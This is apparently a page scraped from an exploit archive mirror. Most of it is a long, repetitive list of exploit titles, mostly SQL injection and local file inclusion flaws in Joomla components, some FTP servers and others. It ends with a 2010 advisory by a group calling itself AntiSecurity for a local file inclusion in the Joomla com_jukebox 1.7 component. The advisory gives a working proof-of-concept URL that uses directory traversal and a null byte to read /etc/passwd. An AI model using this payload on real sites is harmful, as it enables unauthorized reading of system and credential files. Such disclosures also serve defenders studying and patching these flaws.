1e08cb156e
7 new exploits BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Dream FTP Server 1.0.2 - (PORT) Remote Denial of Service BolinTech DreamFTP Server 1.0.2 - (PORT) Remote Denial of Service BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC) BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC) Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure Joomla! Component com_menu - SQL Injection Joomla! Component 'com_menu' - SQL Injection Joomla! Component com_jp_jobs - SQL Injection Joomla! Component 'com_jp_jobs' 1.4.1 - SQL Injection Joomla! Component redSHOP - Local File Inclusion Joomla! Component redTWITTER - Local File Inclusion Joomla! Component WISro Yahoo Quotes - Local File Inclusion Joomla! Component com_press - SQL Injection Joomla! Component Picasa 2.0 - Local File Inclusion Joomla! Component 'com_redshop' 1.0 - Local File Inclusion Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion Joomla! Component 'com_wisroyq' 1.1 - Local File Inclusion Joomla! Component 'com_press' - SQL Injection Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion Joomla! Component com_serie - SQL Injection Joomla! Component 'com_serie' - SQL Injection Joomla! Component com_ranking - SQL Injection Joomla! Component JInventory - Local File Inclusion Joomla! Component com_svmap 1.1.1 - Local File Inclusion Joomla! Component com_shoutbox - Local File Inclusion Joomla! Component com_loginbox - Local File Inclusion Joomla! Component com_bca-rss-syndicator - Local File Inclusion Joomla! Component Magic Updater (com_Joomlaupdater) - Local File Inclusion Joomla! Component 'com_ranking' - SQL Injection Joomla! Component 'com_jinventory' - Local File Inclusion Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion Joomla! Component 'com_shoutbox' - Local File Inclusion Joomla! Component 'com_loginbox' - Local File Inclusion Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion Joomla! Component 'com_Joomlaupdater' - Local File Inclusion Joomla! Component News Portal com_news - Local File Inclusion Joomla! Component FreeStyle FAQ Lite 1.3 com_fss (faqid) - SQL Injection Joomla! Component 'com_news_portal' 1.5.x - Local File Inclusion Joomla! Component 'com_fss' 1.3 - 'faqid' Parameter SQL Injection Joomla! Component Saber Cart com_sebercart - Local File Inclusion Joomla! Component J!WHMCS Integrator com_jwhmcs - Local File Inclusion Joomla! Component Juke Box com_jukebox - Local File Inclusion Joomla! Component Joomla! Flickr com_Joomlaflickr - Local File Inclusion Joomla! Component Highslide JS com_hsconfig - Local File Inclusion Joomla! Component Fabrik com_fabrik - Local File Inclusion Joomla! Component Affiliate Feeds com_datafeeds - Local File Inclusion Joomla! Component Appointment com_appointment - Local File Inclusion Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion Joomla! Component 'com_jwhmcs' 1.5.0 - Local File Inclusion Joomla! Component 'com_jukebox' 1.7 - Local File Inclusion Joomla! Component 'com_Joomlaflickr' 1.0 - Local File Inclusion Joomla! Component 'com_hsconfig' 1.5 - Local File Inclusion Joomla! Component 'com_fabrik' 2.0 - Local File Inclusion Joomla! Component 'com_datafeeds' 880 - Local File Inclusion Joomla! Component 'com_appointment' 1.5 - Local File Inclusion Joomla! Component XOBBIX - prodid SQL Injection Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection Joomla! Component aWiki com_awiki - Local File Inclusion Joomla! Component VJDEO com_vjdeo 1.0 - Local File Inclusion Joomla! Component 'com_awiki' - Local File Inclusion Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion Joomla! Component com_articles - SQL Injection Joomla! Component 'com_articles' - SQL Injection Joomla! Component Webee Comments - Local File Inclusion Joomla! Component Realtyna Translator - Local File Inclusion Joomla! Component AWDwall-Joomla! - (cbuser) Local File Inclusion / SQL Injection Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection Joomla! Component PowerMail Pro com_powermail - Local File Inclusion Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion Joomla! Component Foobla Suggestions com_foobla - Local File Inclusion Joomla! Component JA Voice com_javoice - Local File Inclusion Joomla! Component 'com_foobla_suggestions' 1.5.1.2 - Local File Inclusion Joomla! Component 'com_javoice' - Local File Inclusion Joomla! Component com_pcchess - Local File Inclusion Joomla! Component huruhelpdesk - SQL Injection Joomla! Component 'com_pcchess' - Local File Inclusion Joomla! Component 'com_huruhelpdesk' - SQL Injection Joomla! Component com_agenda 1.0.1 - 'id' SQL Injection Joomla! Component 'com_agenda' 1.0.1 - 'id' Parameter SQL Injection Joomla! Component com_properties[aid] - SQL Injection Joomla! Component allvideos - Blind SQL Injection Joomla! Component com_Ca - SQL Injection Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection Joomla! Component 'com_allvideos' - Blind SQL Injection Joomla! Component 'com_ca' - SQL Injection Joomla! Component TweetLA! - Local File Inclusion Joomla! Component Ticketbook - Local File Inclusion Joomla! Component JA Job Board - Multiple Local File Inclusion Joomla! Component Jfeedback! - Local File Inclusion Joomla! Component JProject Manager - Local File Inclusion Joomla! Component Preventive And Reservation - Local File Inclusion Joomla! Component RokModule - 'moduleid' Blind SQL Injection Joomla! Component spsNewsletter - Local File Inclusion Joomla! Component AlphaUserPoints - Local File Inclusion Joomla! Component TRAVELbook - Local File Inclusion Joomla! Component 'com_tweetla' - Local File Inclusion Joomla! Component 'com_ticketbook' - Local File Inclusion Joomla! Component 'com_jajobboard' - Multiple Local File Inclusion Joomla! Component 'com_jfeedback' - Local File Inclusion Joomla! Component 'com_jprojectmanager' - Local File Inclusion Joomla! Component 'com_preventive' - Local File Inclusion Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection Joomla! Component 'com_spsnewsletter' - Local File Inclusion Joomla! Component 'com_alphauserpoints' 1.5.5 - Local File Inclusion Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion Joomla! Component education - SQL Injection Joomla! Component 'com_education_classess' - SQL Injection Joomla! Component Multi-Venue Restaurant Menu Manager - SQL Injection Joomla! Component 'com_mv_restaurantmenumanager' 1.5.2 - SQL Injection Joomla! Component mv_restaurantmenumanager - SQL Injection Joomla! Component 'mv_restaurantmenumanager' - SQL Injection Joomla! Component Web TV com_webtv - Local File Inclusion Joomla! Component Horoscope com_horoscope - Local File Inclusion Joomla! Component Arcade Games com_arcadegames - Local File Inclusion Joomla! Component Flashgames com_Flashgames - Local File Inclusion Joomla! Component AddressBook com_AddressBook - Local File Inclusion Joomla! Component Easy Ad Banner com_advertising - Local File Inclusion Joomla! Component CV Maker com_cvmaker - Local File Inclusion Joomla! Component My Files com_myfiles - Local File Inclusion Joomla! Component Online Exam com_onlineexam - Local File Inclusion Joomla! Component JoomMail com_joommail - Local File Inclusion Joomla! Component Memory Book com_memory - Local File Inclusion Joomla! Component Online Market com_market - Local File Inclusion Joomla! Component Digital Diary com_diary - Local File Inclusion Joomla! Component 'com_webtv' - Local File Inclusion Joomla! Component 'com_horoscope' - Local File Inclusion Joomla! Component 'com_arcadegames' - Local File Inclusion Joomla! Component 'com_Flashgames' - Local File Inclusion Joomla! Component 'com_AddressBook' - Local File Inclusion Joomla! Component 'com_advertising' - Local File Inclusion Joomla! Component 'com_cvmaker' - Local File Inclusion Joomla! Component 'com_myfiles' - Local File Inclusion Joomla! Component 'com_onlineexam' - Local File Inclusion Joomla! Component 'com_joommail' - Local File Inclusion Joomla! Component 'com_memory' - Local File Inclusion Joomla! Component 'com_market' - Local File Inclusion Joomla! Component 'com_diary' - Local File Inclusion Joomla! Component com_worldrates - Local File Inclusion Joomla! Component com_record - Local File Inclusion Joomla! Component com_sweetykeeper - Local File Inclusion Joomla! Component com_jdrugstopics - SQL Injection Joomla! Component com_sermonspeaker - SQL Injection Joomla! Component com_flexicontent - Local File Joomla! Component 'com_worldrates' - Local File Inclusion Joomla! Component 'com_record' - Local File Inclusion Joomla! Component 'com_sweetykeeper' - Local File Inclusion Joomla! Component 'com_jdrugstopics' - SQL Injection Joomla! Component 'com_sermonspeaker' - SQL Injection Joomla! Component 'com_flexicontent' - Local File Joomla! Component Jvehicles - (aid) SQL Injection Joomla! Component com_jp_jobs 1.2.0 - 'id' SQL Injection Joomla! Component 'com_jvehicles' - 'aid' Parameter SQL Injection Joomla! Component 'com_jp_jobs' 1.2.0 - 'id' Parameter SQL Injection Joomla! Component com_QPersonel - SQL Injection Joomla! Component 'com_QPersonel' - SQL Injection Joomla! Component wgPicasa com_wgpicasa - Local File Inclusion Joomla! Component S5 Clan Roster com_s5clanroster - Local File Inclusion Joomla! Component Photo Battle com_photobattle - Local File Inclusion Joomla! Component MT Fire Eagle com_mtfireeagle - Local File Inclusion Joomla! Component Media Mall Factory com_mediamall - Blind SQL Injection Joomla! Component Love Factory com_lovefactory - Local File Inclusion Joomla! Component JA Comment com_jacomment - Local File Inclusion Joomla! Component Delicious BookMarks com_delicious - Local File Inclusion Joomla! Component Deluxe Blog Factory com_blogfactory - Local File Inclusion Joomla! Component BeeHeard Lite com_beeheard - Local File Inclusion Joomla! Component 'com_wgpicasa' - Local File Inclusion Joomla! Component 'com_s5clanroster' - Local File Inclusion Joomla! Component 'com_photobattle' - Local File Inclusion Joomla! Component 'com_mtfireeagle' - Local File Inclusion Joomla! Component 'com_mediamall' - Blind SQL Injection Joomla! Component 'com_lovefactory' - Local File Inclusion Joomla! Component 'com_jacomment' - Local File Inclusion Joomla! Component 'com_delicious' - Local File Inclusion Joomla! Component 'com_blogfactory' - Local File Inclusion Joomla! Component 'com_beeheard' - Local File Inclusion Joomla! Component com_iproperty 1.5.3 - 'id' SQL Injection Joomla! Component 'com_iproperty' 1.5.3 - 'id' Parameter SQL Injection Joomla! Component com_manager 1.5.3 - 'id' SQL Injection Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection Joomla! Component com_joltcard - SQL Injection Joomla! Component com_pandafminigames - SQL Injection Joomla! Component 'com_joltcard' - SQL Injection Joomla! Component 'com_pandafminigames' - SQL Injection Joomla! Component Archery Scores (com_archeryscores) 1.0.6 - Local File Inclusion Joomla! Component ZiMB Comment com_zimbcomment - Local File Inclusion Joomla! Component ZiMB Manager com_zimbcore - Local File Inclusion Joomla! Component Gadget Factory com_gadgetfactory - Local File Inclusion Joomla! Component Matamko com_matamko - Local File Inclusion Joomla! Component Multiple Root com_multiroot - Local File Inclusion Joomla! Component Multiple Map com_multimap - Local File Inclusion Joomla! Component Contact Us Draw Root Map com_drawroot - Local File Inclusion Joomla! Component Contact Us Google Map com_google - Local File Inclusion Joomla! Component iF surfALERT com_if_surfalert - Local File Inclusion Joomla! Component 'com_archeryscores' 1.0.6 - Local File Inclusion Joomla! Component 'com_zimbcomment' - Local File Inclusion Joomla! Component 'com_zimbcore' - Local File Inclusion Joomla! Component 'com_gadgetfactory' - Local File Inclusion Joomla! Component 'com_matamko' - Local File Inclusion Joomla! Component 'com_multiroot' - Local File Inclusion Joomla! Component 'com_multimap' - Local File Inclusion Joomla! Component 'com_drawroot' - Local File Inclusion Joomla! Component 'com_google' - Local File Inclusion Joomla! Component 'com_if_surfalert' - Local File Inclusion Joomla! Component GBU FACEBOOK 1.0.5 - SQL Injection Joomla! Component 'com_gbufacebook' 1.0.5 - SQL Injection Joomla! Component com_jnewspaper - 'cid' SQL Injection Joomla! Component JTM Reseller 1.9 Beta - SQL Injection Joomla! Component 'com_jnewspaper' - 'cid' Parameter SQL Injection Joomla! Component 'com_jtm' 1.9 Beta - SQL Injection Joomla! Component wmi (com_wmi) - Local File Inclusion Joomla! Component OrgChart com_orgchart - Local File Inclusion Joomla! Component Mms Blog com_mmsblog - Local File Inclusion Joomla! Component 'com_wmi' - Local File Inclusion Joomla! Component 'com_orgchart' - Local File Inclusion Joomla! Component 'com_mmsblog' - Local File Inclusion Joomla! Component com_portfolio - Local File Disclosure Joomla! Component 'com_portfolio' - Local File Disclosure Joomla! Component com_caddy - Exploit Joomla! Component 'com_caddy' - Exploit Joomla! Component com_joomradio - SQL Injection Joomla! Component 'com_joomradio' - SQL Injection Joomla! Component Ultimate Portfolio com_ultimateportfolio - Local File Inclusion Joomla! Component NoticeBoard com_noticeboard - Local File Inclusion Joomla! Component SmartSite com_smartsite - Local File Inclusion Joomla! Extension ABC com_abc - SQL Injection Joomla! Component graphics (com_graphics) 1.0.6 - Local File Inclusion Joomla! Component 'com_ultimateportfolio' - Local File Inclusion Joomla! Component 'com_noticeboard' - Local File Inclusion Joomla! Component 'com_smartsite' - Local File Inclusion Joomla! Component 'com_abc' - SQL Injection Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion Joomla! Component JE Property Finder - Arbitrary File Upload Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload Joomla! Component Wap4Joomla! - 'wapmain.php' SQL Injection Joomla! Component 'Wap4Joomla' - 'wapmain.php' SQL Injection Joomla! Component com_newsfeeds - SQL Injection Joomla! Component 'com_newsfeeds' - SQL Injection Joomla! Component Table JX - Cross-Site Scripting Vulnerabilities Joomla! Component Card View JX - Cross-Site Scripting Joomla! Component 'Table JX' - Cross-Site Scripting Joomla! Component 'Card View JX' - Cross-Site Scripting Joomla! Extension DJ-Classifieds com_djClassifieds - Arbitrary File Upload Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload Joomla! Component com_articleman - Arbitrary File Upload Joomla! Component 'com_articleman' - Arbitrary File Upload Joomla! Component Module Camp26 Visitor Data 1.1 - Remote code Execution Joomla! Component 'mod_VisitorData' 1.1 - Remote code Execution Joomla! Component Custom PHP Pages com_PHP - Local File Inclusion Joomla! Component 'com_PHP' 0.1 - Local File Inclusion Joomla! Component com_konsultasi - 'sid' SQL Injection Joomla! Component 'com_konsultasi' - 'sid' Parameter SQL Injection Joomla! Component Advertising (com_aardvertiser) 2.0 - Local File Inclusion Joomla! Component 'com_aardvertiser' 2.0 - Local File Inclusion Joomla! Component Seber Cart - 'getPic.php' Local File Disclosure Joomla! Component FDione Form Wizard - Local File Inclusion Joomla! Component 'com_sebercart' - 'getPic.php' Local File Disclosure Joomla! Component 'com_dioneformwizard' - Local File Inclusion Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion Joomla! Component 'com_jejob' 1.0 - Local File Inclusion Joomla! Component com_jequoteform - Local File Inclusion Joomla! Component 'com_jequoteform' - Local File Inclusion Joomla! Component MS Comment 0.8.0b - Local File Inclusion Joomla! Component 'com_mscomment' 0.8.0b - Local File Inclusion Joomla! Component com_camp - SQL Injection Joomla! Component 'com_camp' - SQL Injection Joomla! Component simpledownload 0.9.5 - Local File Inclusion Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion Joomla! Component simpledownload 0.9.5 - Local File Disclosure Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure Joomla! Component com_crowdsource - SQL Injection Joomla! Component com_event - Multiple Vulnerabilities Joomla! Component 'com_crowdsource' - SQL Injection Joomla! Component 'com_event' - Multiple Vulnerabilities Joomla! Component com_event - SQL Injection Joomla! Component 'com_event' - SQL Injection Joomla! Component com_packages - SQL Injection Joomla! Component 'com_packages' - SQL Injection Joomla! Component com_qpersonel - SQL Injection Remote Exploit Joomla! Component 'com_qpersonel' 1.0 - SQL Injection BolinTech Dream FTP Server 1.02 - Format String (Metasploit) BolinTech DreamFTP Server 1.02 - Format String (Metasploit) PHP 5.4.3 (Windows x86) - Code Execution PHP 5.4.3 (Windows x86 Polish) - Code Execution Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection Schoolhos CMS Beta 2.29 - 'id' Parameter SQL Injection BolinTech Dream FTP Server 1.0 - User Name Format String (1) BolinTech DreamFTP Server 1.0 - User Name Format String (1) Joomla! Component JoomlaTune JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting Joomla! Component Percha Image Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component Percha Fields Attach 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component Percha Multicategory Article 0.6 - 'index.php' Controller Parameter Arbitrary File Access Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access Joomla! Component com_horses - 'id' Parameter SQL Injection Joomla! Component 'com_horses' - 'id' Parameter SQL Injection FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation FreePBX 13 - Remote Command Execution / Privilege Escalation BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080 / MS14-084) Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read NodCMS - PHP Code Execution Piwik 2.16.0 - 'layout' PHP Object Injection Sophos Web Appliance 4.2.1.3 - Remote Code Execution
39 lines
1.2 KiB
Text
Executable file
39 lines
1.2 KiB
Text
Executable file
=============================================================================================================
|
|
|
|
|
|
[o] Joomla Component Juke Box Local File Inclusion Vulnerability
|
|
|
|
Software : com_jukebox version 1.7
|
|
Vendor : http://www.jooforge.com/
|
|
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
|
|
Contact : public[dot]antisecurity[dot]org
|
|
Home : http://antisecurity.org/
|
|
|
|
|
|
=============================================================================================================
|
|
|
|
|
|
[o] Exploit
|
|
|
|
http://localhost/[path]/index.php?option=com_jukebox&controller=[LFI]
|
|
|
|
|
|
[o] PoC
|
|
|
|
http://localhost/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
|
|
|
|
|
|
=============================================================================================================
|
|
|
|
|
|
[o] Greetz
|
|
|
|
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
|
|
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
|
|
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
|
|
|
|
|
|
=============================================================================================================
|
|
|
|
|
|
[o] April 06 2010 - GMT +07:00 Jakarta, Indonesia
|